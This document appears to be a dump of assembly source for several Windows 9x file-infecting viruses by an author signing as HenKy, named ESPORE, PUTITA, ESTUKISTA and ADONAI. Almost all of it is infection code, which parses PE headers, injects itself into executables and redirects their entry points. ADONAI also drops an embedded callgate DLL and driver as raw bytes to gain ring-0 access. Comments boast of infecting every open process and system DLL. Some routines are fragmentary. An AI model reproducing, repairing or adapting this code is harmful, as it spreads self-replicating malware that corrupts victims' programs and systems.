push 12345678h
returnAddr equ $-4
ret
checkFile:
mov esi,dword ptr [edx+1ch]
mov ebx,edi
cmp word ptr [edi],'ZM'
jne exitHook
cmp ecx,dword ptr [edi+3ch]
jb exitHook
add edi,dword ptr [edi+3ch]
cmp word ptr [edi],'EP'
jne exitHook
mov esi,edi
mov eax,18h
add ax,word ptr [edi+14h]
add edi,eax
mov ecx,VSIZE
xor eax,eax
pushad
rep scasb
popad
jnz exitHook
push edi
sub edi,ebx
xchg edi,dword ptr [esi+28h]
mov eax,dword ptr [esi+34h]
add edi,eax
mov dword ptr [hostEP-vBegin+ebp],edi
pop edi
mov esi,ebp
rep movsb
jmp exitHook
beep:
dec cl
in al,61h
push ax
or al,03h
out 61h,al
mov al,0b6h
out 43h,al
mov ax,987
mov si,ax
beep_loop:
add si,100h
mov ax,si
out 42h,al
xchg al,ah
out 42h,al
loop beep_loop
pop ax
out 61h,al
jmp exitHook
fakeHost:
push 0h
call ExitProcess
Ends
End inicio
;---------------------------- W95 ESPORE BY HenKy -----------------------------
;
;-AUTHOR: HenKy
;
;-MAIL: HenKy_@latinmail.com
;
;-ORIGIN: SPAIN
;
; WOW!!!! 140 BYTES !!!! AND 100% RING 3 !!!! (ONLY WINDOZE 9X CAN SUPPORT IT)
; PRIVILEGES
; THE INITIAL EDX VALUE POINTS TO A 28KB CACHE BUFFER WICH CONTAINS SEVERAL
.386P
.MODEL FLAT
LOCALS
EXTRN ExitProcess:PROC
MIX_SIZ EQU (FILE_END - MEGAMIX)
MACROSIZE MACRO
DB MIX_SIZ/00100 mod 10 + "0"
DB MIX_SIZ/00010 mod 10 + "0"
DB MIX_SIZ/00001 mod 10 + "0"
ENDM
.DATA
DB 'BIEN PEKEÑO BIEN... LIKE AN ESPORE... HEHEHE',0
DB ' W9X ESPORE SIZE = '
MACROSIZE
.CODE
VINT21:
DD 0BFF712B9h ; MOV ECX,048BFF71H ;-) Z0MBiE
DB 'H' ; HenKy ;P
XCHG EDI, EAX ; EDI: DELTA
MOV ESI,0C1000000H ; ESI: BUFFER
MOV EBP,EDI ; NOW: EBP=EDI=DELTA=INT21H
PHECT:
XOR ECX,ECX
MOV EDX, ESI
MOV AH, 3Fh
CALL R_W
MOV ECX, [ESI+3Ch]
LEA EAX, [ESI+ECX]
CMP BYTE PTR [EAX], "P"
JNE WARNING
MOV ECX,[EAX+28H]
CMP ECX, 1024
JB WARNING
PUSH EBP
ADD ECX,[EAX+34H]
MOV [EBP+OLD_EIP-MEGAMIX],ECX
MOV EDI,EAX
PORRO:
INC EDI
CMP BYTE PTR [EDI],'B' ; hehehehe
JNE PORRO
INC EDI
SUB EDI,ESI
MOV EDX,EDI
XCHG DWORD PTR [EAX+28h], EDI
LEA EDI, [ESI+EDX]
PUSH MIX_SIZ/4
POP ECX
POP EAX
PUSH EAX
XCHG ESI,EAX
REP MOVSD
POP EDI
MOV EDX, EAX
W:
MOV AH, 40h
R_W:
PUSHAD
XOR EAX,EAX
MOV AH, 42h
CDQ
CALL [EDI]
POPAD
MOV CH, 4h
CALL [EDI]
RET
ALIGN 4
FILE_END:
PUSH 0
CALL ExitProcess
END MEGAMIX
;---------------------------- W95 PUTITA BY HenKy -----------------------------
;
;-AUTHOR: HenKy
;
;-MAIL: HenKy_@latinmail.com
;
;-ORIGIN: SPAIN
;
.386P
.MODEL FLAT
LOCALS
EXTRN ExitProcess:PROC
MIX_SIZ EQU (FILE_END - MEGAMIX)
.DATA
DB '0
.CODE
MEGAMIX:
VINT21:
DD 0BFF712B9h ; MOV ECX,0C3B912F7H ;-) Z0MBiE
RETOX: RET
XCHG EDI, EAX ; EDI: DELTA
MOV ESI,0C1000000H ; ESI: BUFFER
MOV EBP,EDI ; NOW: EBP=EDI=DELTA=INT21H
PUSH ES
PUSH EBX
PUSH DS
POP ES
PUSH ES
POP DS
PUSH 00401000H
OLD_EIP EQU $-4
PUSH EDI
WARNING:POP EDI
RET
PHECT:
PUSH EDI
XOR ECX,ECX
MOV EDX, ESI
PUSH ESI
MOV AH, 3Fh
CALL R_W
MOV ECX,[EAX+28H]
ADD ECX,[EAX+34H]
MOV [EBP+OLD_EIP-MEGAMIX],ECX
MOV EDI,EAX
PORRO:
INC EDI
CMP BYTE PTR [EDI],'B' ; hehehehe
JNE PORRO
INC EDI
POP ECX
SUB EDI,ECX
MOV EDX,EDI
XCHG DWORD PTR [EAX+28h], EDI
LEA EDI, [ESI+EDX]
PUSH MIX_SIZ/4
POP ECX
POP EAX
PUSH EAX
XCHG ESI, EAX
REP MOVSD
POP EDI
MOV EDX, EAX
W:
MOV AH, 40h
R_W:
PUSHAD
XOR EAX,EAX
MOV AH, 42h
CDQ
CALL [EDI]
POPAD
MOV CH, 4h
CALL [EDI]
RET
IMASK DB "*.ZZZ", 0
ALIGN 4
FILE_END:
SF STRUC
DB 1024 DUP(?)
DTA DB 43 DUP(?)
SF ENDS
PUSH 0
CALL ExitProcess
END MEGAMIX
;-------------------------------- W95 ESTUKISTA BY HenKy -----------------------------
;
;-AUTHOR: HenKy
;
;-MAIL: HenKy_@latinmail.com
;
;-ORIGIN: SPAIN
;
; INFECTS *ALL* OPEN PROCESES AND EVEN ALL DLL AND MODULES IMPORTED BY THEM
; THE INITIAL ESI VALUE POINTS TO A READABLE MEMORY ZONE (SEEMS TO BE A CACHE ONE
; WHERE WINDOWS LOADS THE PE HEADER, THE IMPORTANT THING IS THAT HERE U CAN FIND
;BUGS: * THE BAD THING IS THAT ESI INITIAL VALUE ON SOME FILES POINTS TO KERNEL, CAUSING
; THAT NO FILENAME FOUND (VIRUS WILL INFECT NOTHING AND WILL RETURN TO HOST).
; * ANOTHER POSSIBLE BUG IS THAT 0C1000000H MAYBE NOT READ/WRITE ON ALL COMPUTERS
; (AT LEAST IN MY W95 AND W98 WORKS FINE, AND INTO COMPUTER'S FRIEND WITH 98 WORKS
TOO)
; * AND THE MORE PAINLY THING IS THE MASK LIMIT.... IF VERY LOW-> LESS INFECTIOUS
; IF VERY HIGH-> RISK OF READ NON-MAPPED AREA (AS WE ARE IN RING 3 IT WILL HANG
WINDOZE)
; ANYWAY IN MY TESTS A LOT OF FILES BECOME INFECTED , MANY OF THEM WINDOWS DLL'S
;DUMP OF INITIAL ESI VALUE OF MY COMPILED BINARY (I HAVE AN OPEN PROCESS CALLED AZPR.EXE)
;81621788 FF FF FF FF 04 00 00 00 00 00 00 00 00 00 00 00 ÿÿÿÿEOT
;81621798 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
;816217A8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
;816217B8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
;816217C8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
;816217D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
;816217E8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
;816217F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
;81621808 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
;81621818 00 00 00 00 00 00 00 00 20 00 00 A0 43 3A 5C 57 C:\W
;81621828 49 4E 50 52 4F 47 5C 41 5A 50 52 5C 41 5A 50 52 INPROG\AZPR\AZPR
;81621838 2E 45 58 45 20 00 00 00 48 00 00 A0 44 00 00 00 .EXE H D
; ....
; ....
;81621E38 00 1C 00 00 00 C8 00 00 00 00 00 00 00 00 00 00 FS È
;81621E48 00 00 00 00 40 00 00 C0 2E 62 73 73 00 00 00 00 @ À.bss
;81621E58 00 50 05 00 00 00 03 00 00 50 05 00 00 00 00 00 PENQ ETX PENQ
;81621E68 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 @ À
;81621E78 2E 72 65 6C 6F 63 00 00 00 50 00 00 00 50 08 00 .reloc P PBS
;81621E88 00 00 00 00 00 E4 00 00 00 00 00 00 00 00 00 00 ä
;81621E98 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 @ À.rsrc
;81621EA8 00 A0 02 00 00 A0 08 00 00 9A 01 00 00 E4 00 00 STX BS šSOH ä
;81621EB8 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 @ À
;81621EC8 61 73 70 72 00 00 00 00 00 40 01 00 00 40 0B 00 aspr @SOH @VT
;81621ED8 00 3A 01 00 00 7E 02 00 00 00 00 00 00 00 00 00 :SOH ~STX
;81621EE8 00 00 00 00 50 08 00 C0 2E 64 61 74 61 00 00 00 PBS À.data
;81621EF8 00 10 00 00 00 80 0C 00 00 00 00 00 00 B8 03 00 DLE €FF ¸ETX
;81621F08 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 @ À
;81621F18 40 00 00 A0 00 00 00 00 E0 1C 62 81 FF FF FF FF @ àFSb ÿÿÿÿ
;81621F28 E0 13 62 81 F0 13 62 81 18 00 08 00 8F 02 00 00 àDC3b ðDC3b CAN BS STX
;81621F38 08 00 00 00 00 00 00 00 00 00 40 00 D7 2B 01 00 BS @ ×+SOH
;81621F48 30 23 62 81 5C 1F 62 81 18 00 6C 1F 62 81 08 00 0#b \USb CAN lUSb BS
;81621F58 20 00 00 A0 43 3A 5C 57 49 4E 50 52 4F 47 5C 41 C:\WINPROG\A
;81621F68 5A 50 52 5C 41 5A 50 52 2E 45 58 45 00 CC CC CC ZPR\AZPR.EXE ÌÌÌ
;81621F78 B4 03 00 A0 4E 45 01 00 00 00 00 00 00 00 8C 03 ´ETX NESOH ŒETX
; ....
.586P
PMMX ; WORF... ... JEJEJE
.MODEL FLAT
LOCALS
EXTRN ExitProcess:PROC
MIX_SIZ EQU (FILE_END - MEGAMIX)
MACROSIZE MACRO
DB MIX_SIZ/00100 mod 10 + "0"
DB MIX_SIZ/00010 mod 10 + "0"
DB MIX_SIZ/00001 mod 10 + "0"
ENDM
.DATA
DB 0
DB 'SIZE = '
MACROSIZE
.CODE
MEGAMIX:
; EAX: EIP
; ESI: BUFFER
VINT21:
DD 0BFF712B9h ; MOV ECX,048BFF71H ;-) Z0MBiE
DB 'H' ; HenKy ;P
XCHG EDI, EAX ; EDI: DELTA
MOV EDX,ESI ; EDX=ESI: CACHE BUFFER (ESPORE BUG)
MOV ESI,0C1000000H ; ESI: MY DATA BUFFER
MOV EBP,EDI ; NOW: EBP=EDI=DELTA=INT21H
AMIMELASUDA:
POPAD
PORK:
INC EDX
CMP WORD PTR [EDX],':C'
JE KAA
LOOP PORK
WARNING:
PUSH 00401000H ; ANOTHER ESPORE BUG CORRECTED :)
RET
KAA:
PUSHAD
MOV AX, 3D02h ; open
CALL [EDI]
JC AMIMELASUDA
XCHG EBX, EAX
MOV EDX,ESI
XOR ECX,ECX
MOV CH,4H
MOV AH, 3Fh ;read
CALL [EDI]
MOV EAX, [EDX+3Ch]
ADD EAX,EDX
MOV EDI,EAX
PUSH 32
POP ECX
DEPOTA:
INC EDI
CMP BYTE PTR [EDI],'B'; HEHEHEHE
JE GOSTRO
JMP DEPOTA
GOSTRO:
INC EDI
PUSH EDI
MOV ESI,EBP
REP MOVSD
MOV ESI,EDI
POP EDI
SUB EDI,EDX
XCHG DWORD PTR [EAX+28H],EDI
CMP DI,1024
JB CLOZ
ADD EDI,[EAX+34H]
XCHG DWORD PTR [ESI-MONGORE],EDI
PUSH EBP
POP EDI
XOR EAX,EAX
PUSHAD
MOV AH, 42h
CDQ
CALL [EDI]
POPAD
MOV CH,4H
MOV AH,40H ; write
CALL [EDI]
CLOZ:
MOV AH,3EH ; close
CALL [EDI]
JMP AMIMELASUDA
FILE_END:
DW 0 ;-P
PUSH 0
CALL ExitProcess
;POPOPOP DB "H:\PRUEBAS\TEST.ZZZ",0
END MEGAMIX
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ADONAI.ASM]ÄÄÄ
.586P
.MODEL FLAT
LOCALS
EXTRN ExitProcess:PROC
MACROSIZE MACRO
ENDM
.DATA
DB 0 ; ZERO :/
.CODE
MEGAMIX:
FNOP
DB 'henKy'
POP EBP
CALL DELTA
DELTA: POP EBP
MOV ECX,EBP
SUB ECX,NABLA
SUB ECX,00001000H
NEW_EIP EQU $-4
MOV DWORD PTR [EBP+BASE-DELTA],ECX
F_GPA:
MOV EBX, [EAX+3Ch]
ADD EBX, EAX
MOV EBX, [EBX+120]
ADD EBX, EAX ; BEST METHOD :P
MOV ESI, [EBX+(3*4)]
ADD ESI, EAX
MOV EDX, [EBX+(8*4)]
ADD EDX, EAX
MOV ECX, [EBX+(6*4)]
DEC ECX
FIND_GPA:
LOOP_FGPA:
LOOP FIND_GPA
XCHG EAX,EBX
LEA ESI, [EBP+APIs-DELTA]
LEA EDI, [EBP+APIaddresses-DELTA]
NPI:
LODSB
OR AL, AL
JNZ SHORT NPI
CMP [ESI], AL
JNZ GPI
LEA EAX,[EBP+DLLN-DELTA]
MOV ECX,DLL_SIZ
CALL CREADOR
CDQ
PUSH EDX
LEA EBX, [EBP+BYTES-DELTA]
PUSH EBX
PUSH DLL_SIZ
LEA EAX, [EBP+DLL-DELTA]
PUSH EAX
PUSH DWORD PTR [EBP+FileHandle-DELTA]
CALL DWORD PTR [EBP+WriteFileA-DELTA]
PUSH DWORD PTR [EBP+FileHandle-DELTA]
CALL DWORD PTR [EBP+CloseHandle-DELTA]
LEA EAX,[EBP+SYSN-DELTA]
MOV ECX,SYS_SIZ
CALL CREADOR
CDQ
PUSH EDX
LEA EBX, [EBP+BYTES-DELTA]
PUSH EBX
PUSH SYS_SIZ
LEA EAX, [EBP+SYS-DELTA]
PUSH EAX
PUSH DWORD PTR [EBP+FileHandle-DELTA]
CALL DWORD PTR [EBP+WriteFileA-DELTA]
RETURN:
LEA EAX,[EBP+DLLN-DELTA]
PUSH EAX
CALL [EBP+FreeLibraryA-DELTA]
LEA EAX,[EBP+DLLN-DELTA]
PUSH EAX
CALL DWORD PTR [EBP+DeleteFileA-DELTA]
INFECT:
LOOPER:
INC EAX
JZ WARNING
DEC EAX
OR EAX,EAX
JNZ ALLKEY
WARNING:
EXIT:
MOV EAX,12345678H
ORG $-4
OLD_EIP DD 00001000H
ADD EAX,12345678H
ORG $-4
BASE DD 00400000H
PUSH EAX
RET
ALLKEY:
INC EAX
JZ Cerrar
DEC EAX
MOV DWORD PTR [EBP+FileHandle-DELTA],EAX ; SAVE HNDL
MOV ECX, DWORD PTR [EBP+WFD_nFileSizeLow-DELTA]
CALL CreateMap ; CREATE A MAP
OR EAX,EAX
JZ Cerrar
MOV DWORD PTR [EBP+MapHandle-DELTA],EAX
MOV ECX, DWORD PTR [EBP+WFD_nFileSizeLow-DELTA]
CALL MapFile ; MEMORY PROYECTION
OR EAX,EAX
JZ Cerrar
MOV DWORD PTR [EBP+MapAddress-DELTA],EAX
MOV ESI,EAX ; GET PE HDR
MOV ESI,[EAX+3CH]
ADD ESI,EAX
CMP BYTE PTR [ESI],"P" ; IS A 'P'E ?
JNZ Cerrar
CMP BYTE PTR [ESI+MARKA],"H" ; HenKy IS HERE ?
JZ Cerrar
CALL Align
XCHG ECX,EAX
MOV DWORD PTR [EBP+NewSize-DELTA],ECX
CALL CreateMap
OR EAX,EAX
JZ Cerrar
MOV DWORD PTR [EBP+MapHandle-DELTA],EAX
MOV ECX,DWORD PTR [EBP+NewSize-DELTA]
CALL MapFile
NO_REL:
POPAD
MOV EAX,[EDI+28H]
MOV DWORD PTR [EBP+OLD_EIP-DELTA],EAX ;SAVE OLD EIP
MOV EDX,[ESI+10H]
MOV EBX,EDX
ADD EDX,[ESI+14H]
PUSH EDX
MOV EAX,EBX
ADD EAX,[ESI+0CH]
MOV DWORD PTR [EBP+NEW_EIP-DELTA],EAX
XCHG EAX,[EDI+28H] ; NEW EIP
MOV EAX,[ESI+10H]
ADD EAX,MIX_SIZ
MOV ECX,[EDI+3CH]
CALL Align
UnMapFile:
CloseMap:
Cerrar:
TOPO:
CreateMap:
CDQ
PUSH EDX
PUSH ECX
PUSH EDX
PUSH 4H
PUSH EDX
PUSH DWORD PTR [EBP+FileHandle-DELTA]
CALL DWORD PTR [EBP+CreateFileMappingA-DELTA]
RET
MapFile:
CDQ
PUSH ECX
PUSH EDX
PUSH EDX
INC EDX
INC EDX
PUSH EDX
PUSH DWORD PTR [EBP+MapHandle-DELTA]
CALL DWORD PTR [EBP+MapViewOfFile-DELTA]
RET
CREADOR:
CDQ
PUSH EDX
PUSH ECX
INC EDX
PUSH EDX
DEC EDX
PUSH EDX
PUSH EDX
PUSH 80000000h + 40000000h
PUSH EAX
CALL DWORD PTR [EBP+CreateFile-DELTA]
MOV DWORD PTR [EBP+FileHandle-DELTA],EAX
RET
Align:
PUSH EDX
CDQ
PUSH EAX
DIV ECX
POP EAX
SUB ECX,EDX
ADD EAX,ECX
POP EDX
RET
INIT_E:
CALL MY
MY:
POP EDI
SUB EDI,OFFSET MY
PUSH EBP
MOV EBP,ESP
SUB ESP,18H
PUSH ESI
CALL SEL32
DLLN DB 'callgate.dll',00h
SEL32:
CALL [EDI+LoadLibraryA]
PUSH EAX
CALL EXEC
DB '_CreateCallGate@12',00h
EXEC:
PUSH EAX
CALL [EDI+GPA]
MOV EBX,EAX
DW 05dffh
DB 0e8h
ERROR:
XOR EAX,EAX
POP ESI
MOV ESP,EBP
POP EBP
JMP RETURN
RING0:
PUSH EBP
MOV EBP,ESP
PUSHAD
MOV AX, 1000
MOV BX, 200
MOV CX, AX
MOV AL, 0b6h
OUT 43h, AL
MOV DX, 0012h
MOV AX, 34dch
DIV CX
OUT 42h, AL
MOV AL,AH
OUT 42h, AL
IN AL, 61h
MOV AH, AL
OR AL, 03h
OUT 61h, AL
l1:
MOV ECX, 9680
l2:
LOOP l2
DEC BX
JNZ l1
MOV AL, AH
OUT 61h, AL
POPAD
POP EBP
RETF 0Ch
SYSN DB 'callgate.sys',0
APIs:
DB "CreateFileA",0
DB "CloseHandle",0
DB "FindFirstFileA",0
DB "FindNextFileA",0
DB "ReadFile",0
DB "MapViewOfFile",0
DB "UnmapViewOfFile",0
DB "CreateFileMappingA",0
DB "LoadLibraryA",0
DB "FreeLibrary",0
DB "WriteFile",0
DB "DeleteFileA",0
Zero_ DB 0
GPA_95 DB 0C2H,04H,00H,57H,6AH,22H,2Bh,0D2H
GPA_NT DB 0C2H,04H,00H,55H,8Bh,4CH,24H,0CH
GPA_2KB DB 48H,03H,00H,55H,8Bh,0ECh,51H,51H
;GPA_2K DB 00FH,00H,00H,55H,8Bh,0ECh,51H,51H
DLL DB 04DH,05AH,090H,000H,003H,000H,000H,000H,004H,000H,000H,000H,0FFH,0FFH
DB 000H,000H,0B8H,000H,000H,000H,000H,000H,000H,000H,040H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,080H,000H,000H,000H,00EH,01FH,0BAH,00EH,000H,0B4H,009H,0CDH,021H,0B8H
DB 001H,04CH,0CDH,021H,054H,068H,069H,073H,020H,070H,072H,06FH,067H,072H,061H
DB 06DH,020H,063H,061H,06EH,06EH,06FH,074H,020H,062H,065H,020H,072H,075H,06EH
DB 020H,069H,06EH,020H,044H,04FH,053H,020H,06DH,06FH,064H,065H,02EH,00DH,00DH
DB 00AH,024H,000H,000H,000H,000H,000H,000H,000H,050H,045H,000H,000H,04CH,001H
DB 005H,000H,0E1H,08EH,063H,033H,000H,000H,000H,000H,000H,000H,000H,000H,0E0H
DB 000H,00EH,021H,00BH,001H,003H,000H,000H,028H,000H,000H,000H,074H,000H,000H
DB 000H,000H,000H,000H,0B0H,016H,000H,000H,000H,010H,000H,000H,000H,040H,000H
DB 000H,000H,000H,000H,010H,000H,010H,000H,000H,000H,002H,000H,000H,004H,000H
DB 000H,000H,000H,000H,000H,000H,004H,000H,000H,000H,000H,000H,000H,000H,000H
DB 0E0H,000H,000H,000H,004H,000H,000H,000H,000H,000H,000H,002H,000H,000H,000H
DB 000H,000H,010H,000H,000H,010H,000H,000H,000H,000H,010H,000H,000H,010H,000H
DB 000H,000H,000H,000H,000H,010H,000H,000H,000H,060H,040H,000H,000H,06CH,000H
DB 000H,000H,000H,0C0H,000H,000H,050H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,0D0H,000H,000H,00CH,003H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 024H,0C1H,000H,000H,0D4H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,02EH,074H,065H,078H,074H,000H,000H,000H,0CBH,027H,000H,000H,000H
DB 010H,000H,000H,000H,028H,000H,000H,000H,004H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,020H,000H,000H,060H,02EH,072H,064H
DB 061H,074H,061H,000H,000H,0CCH,000H,000H,000H,000H,040H,000H,000H,000H,002H
DB 000H,000H,000H,02CH,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,040H,000H,000H,040H,02EH,064H,061H,074H,061H,000H,000H,000H
DB 048H,065H,000H,000H,000H,050H,000H,000H,000H,010H,000H,000H,000H,02EH,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,040H,000H
DB 000H,0C0H,02EH,069H,064H,061H,074H,061H,000H,000H,08AH,005H,000H,000H,000H
DB 0C0H,000H,000H,000H,006H,000H,000H,000H,03EH,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,040H,000H,000H,0C0H,02EH,072H,065H
DB 06CH,06FH,063H,000H,000H,06CH,005H,000H,000H,000H,0D0H,000H,000H,000H,006H
DB 000H,000H,000H,044H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,040H,000H,000H,042H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,083H,0ECH,014H,056H,057H,08BH,074H,024H,028H,085H
DB 0F6H,075H,00DH,0B8H,002H,000H,000H,000H,05FH,05EH,083H,0C4H,014H,0C2H,00CH
DB 000H,08DH,044H,024H,008H,08BH,00DH,03CH,050H,000H,010H,050H,068H,030H,0A0H
DB 000H,010H,051H,0E8H,000H,003H,000H,000H,083H,0C4H,00CH,085H,0C0H,075H,00DH
DB 0B8H,001H,000H,000H,000H,05FH,05EH,083H,0C4H,014H,0C2H,00CH,000H,08DH,044H
DB 024H,00CH,033H,0C9H,08BH,054H,024H,020H,051H,089H,008H,089H,048H,004H,089H
DB 048H,008H,08BH,044H,024H,028H,08DH,04CH,024H,01CH,089H,054H,024H,010H,08DH
DB 054H,024H,010H,051H,089H,044H,024H,018H,06AH,00CH,08BH,044H,024H,014H,052H
DB 08DH,054H,024H,01CH,06AH,00CH,052H,08BH,03DH,050H,0C1H,000H,010H,068H,0C0H
DB 020H,000H,083H,050H,0FFH,0D7H,085H,0C0H,075H,027H,08BH,044H,024H,008H,050H
DB 0FFH,015H,090H,0C1H,000H,010H,08BH,00DH,03CH,050H,000H,010H,051H,0E8H,0EDH
DB 003H,000H,000H,083H,0C4H,004H,0B8H,003H,000H,000H,000H,05FH,05EH,083H,0C4H
DB 014H,0C2H,00CH,000H,066H,081H,07CH,024H,016H,000H,020H,072H,048H,08DH,044H
DB 024H,018H,06AH,000H,08DH,04CH,024H,010H,050H,08BH,044H,024H,010H,06AH,00CH
DB 051H,06AH,00CH,08DH,04CH,024H,020H,051H,068H,0C4H,020H,000H,083H,050H,0FFH
DB 0D7H,08BH,04CH,024H,008H,051H,0FFH,015H,090H,0C1H,000H,010H,08BH,00DH,03CH
DB 050H,000H,010H,051H,0E8H,09CH,003H,000H,000H,083H,0C4H,004H,0B8H,002H,000H
DB 000H,000H,05FH,05EH,083H,0C4H,014H,0C2H,00CH,000H,08BH,044H,024H,008H,050H
DB 0FFH,015H,090H,0C1H,000H,010H,066H,08BH,054H,024H,014H,033H,0C9H,066H,08BH
DB 04CH,024H,016H,066H,089H,014H,04DH,030H,060H,000H,010H,066H,089H,00EH,0A1H
DB 03CH,050H,000H,010H,050H,0E8H,05FH,003H,000H,000H,083H,0C4H,004H,033H,0C0H
DB 05FH,05EH,083H,0C4H,014H,0C2H,00CH,000H,0CCH,0CCH,083H,0ECH,014H,056H,057H
DB 066H,08BH,07CH,024H,020H,066H,081H,0FFH,000H,020H,072H,00DH,0B8H,002H,000H
DB 000H,000H,05FH,05EH,083H,0C4H,014H,0C2H,004H,000H,00FH,0B7H,0C7H,08DH,034H
DB 045H,030H,060H,000H,010H,066H,081H,03EH,0FFH,0FFH,075H,00DH,0B8H,002H,000H
DB 000H,000H,05FH,05EH,083H,0C4H,014H,0C2H,004H,000H,08DH,044H,024H,008H,08BH
DB 00DH,03CH,050H,000H,010H,050H,068H,030H,0A0H,000H,010H,051H,0E8H,09EH,001H
DB 000H,000H,083H,0C4H,00CH,085H,0C0H,075H,00DH,0B8H,001H,000H,000H,000H,05FH
DB 05EH,083H,0C4H,014H,0C2H,004H,000H,066H,08BH,016H,08DH,044H,024H,00CH,033H
DB 0C9H,051H,089H,008H,089H,048H,004H,089H,048H,008H,08DH,044H,024H,01CH,066H
DB 089H,07CH,024H,01AH,050H,066H,089H,054H,024H,01CH,06AH,00CH,08DH,04CH,024H
DB 018H,08BH,044H,024H,014H,051H,06AH,00CH,08DH,04CH,024H,020H,051H,068H,0C4H
DB 020H,000H,083H,050H,0FFH,015H,050H,0C1H,000H,010H,085H,0C0H,075H,027H,08BH
DB 044H,024H,008H,050H,0FFH,015H,090H,0C1H,000H,010H,08BH,00DH,03CH,050H,000H
DB 010H,051H,0E8H,090H,002H,000H,000H,083H,0C4H,004H,0B8H,003H,000H,000H,000H
DB 05FH,05EH,083H,0C4H,014H,0C2H,004H,000H,066H,0C7H,006H,0FFH,0FFH,08BH,044H
DB 024H,008H,050H,0FFH,015H,090H,0C1H,000H,010H,08BH,00DH,03CH,050H,000H,010H
DB 051H,0E8H,064H,002H,000H,000H,083H,0C4H,004H,033H,0C0H,05FH,05EH,083H,0C4H
DB 014H,0C2H,004H,000H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,08BH,044H,024H,008H
DB 056H,057H,085H,0C0H,074H,00FH,083H,0F8H,001H,074H,034H,0B8H,001H,000H,000H
